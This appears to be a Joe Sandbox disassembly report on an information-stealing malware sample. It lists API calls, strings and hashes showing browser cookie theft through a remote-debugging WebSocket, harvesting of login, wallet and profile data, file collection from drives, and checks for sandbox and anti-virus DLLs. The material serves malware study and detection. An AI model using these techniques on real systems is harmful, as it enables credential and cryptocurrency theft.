ory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                                      • API String ID: 2238633743-859426583
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,76EC5E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,76EC5E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                                      • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                                      • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                                      • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                                      • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                                      • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                                      • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                                      • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                                      • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                                      • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                                      • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}
                                                                                                                                                                                                                                                                                      • API String ID: 2888708447-1943833848
                                                                                                                                                                                                                                                                                      • Opcode ID: 1df36d042cab634cffa96afa8ef0f025dcee86d70f5e52261c321231cb3b4a1f
                                                                                                                                                                                                                                                                                      • Instruction ID: e4f2ee01d7335c5added529db0d38c8452bd00aeee575b7ecc144f5d552c7b4a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1df36d042cab634cffa96afa8ef0f025dcee86d70f5e52261c321231cb3b4a1f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3C2D3706087808BD734DB28C894BAFB7E1AF85318F14093EF596AB3C1D7799844CB5A

APIs
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
• FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
• strlen.MSVCRT ref: 00408311
• memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
• strlen.MSVCRT ref: 0040839B
• memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
• ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
Strings
Memory Dump Source
• Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcatlstrlenmemcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
• String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite
• API String ID: 664854069-3644845557
• Opcode ID: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
• Instruction ID: 4855d12272032d1875a7082c41d92aaf51c32be0ad940928e656d1a7aac375ca
• Opcode Fuzzy Hash: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
• Instruction Fuzzy Hash: 0FB2A331A006199BCB10EFA1CD95AEEB779BF48304F40419EF8056B192DF78AEC5CB95

Control-flow Graph
APIs
• wsprintfA.USER32 ref: 00414012
• FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
• memset.MSVCRT ref: 00414039
• memset.MSVCRT ref: 0041404F
  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
• strlen.MSVCRT ref: 004140E5
• memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
• strlen.MSVCRT ref: 00414197
• memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
• ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                                      • API String ID: 330858031-1484801792
                                                                                                                                                                                                                                                                                      • Opcode ID: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                      • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                      • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strlen$Desktopmemcpy$??3@CreateOpenSleeplstrcpy
                                                                                                                                                                                                                                                                                      • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies
                                                                                                                                                                                                                                                                                      • API String ID: 509579932-957743217
                                                                                                                                                                                                                                                                                      • Opcode ID: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                      • Instruction ID: 88d1e3b40fbcb0df37290dc8620aa57b8ac853b7570111a731a950e539c68a8a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F1F431D046049BDB11EF64CD81BEEB7B0AF45304F00456EF90677292EB79A9C5CB9A

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401970
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindFirstlstrcpystrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                                      • API String ID: 2655114730-2645412951
                                                                                                                                                                                                                                                                                      • Opcode ID: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                      • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlenmemmovestrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                                      • API String ID: 1425610001-450108884
                                                                                                                                                                                                                                                                                      • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcatmemcmpstrlen$??3@FileFindFirstlstrlenmemmove
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                                      • API String ID: 3809920955-2608480989
                                                                                                                                                                                                                                                                                      • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                      • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,7591F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                                      • API String ID: 1586166983-3272603366
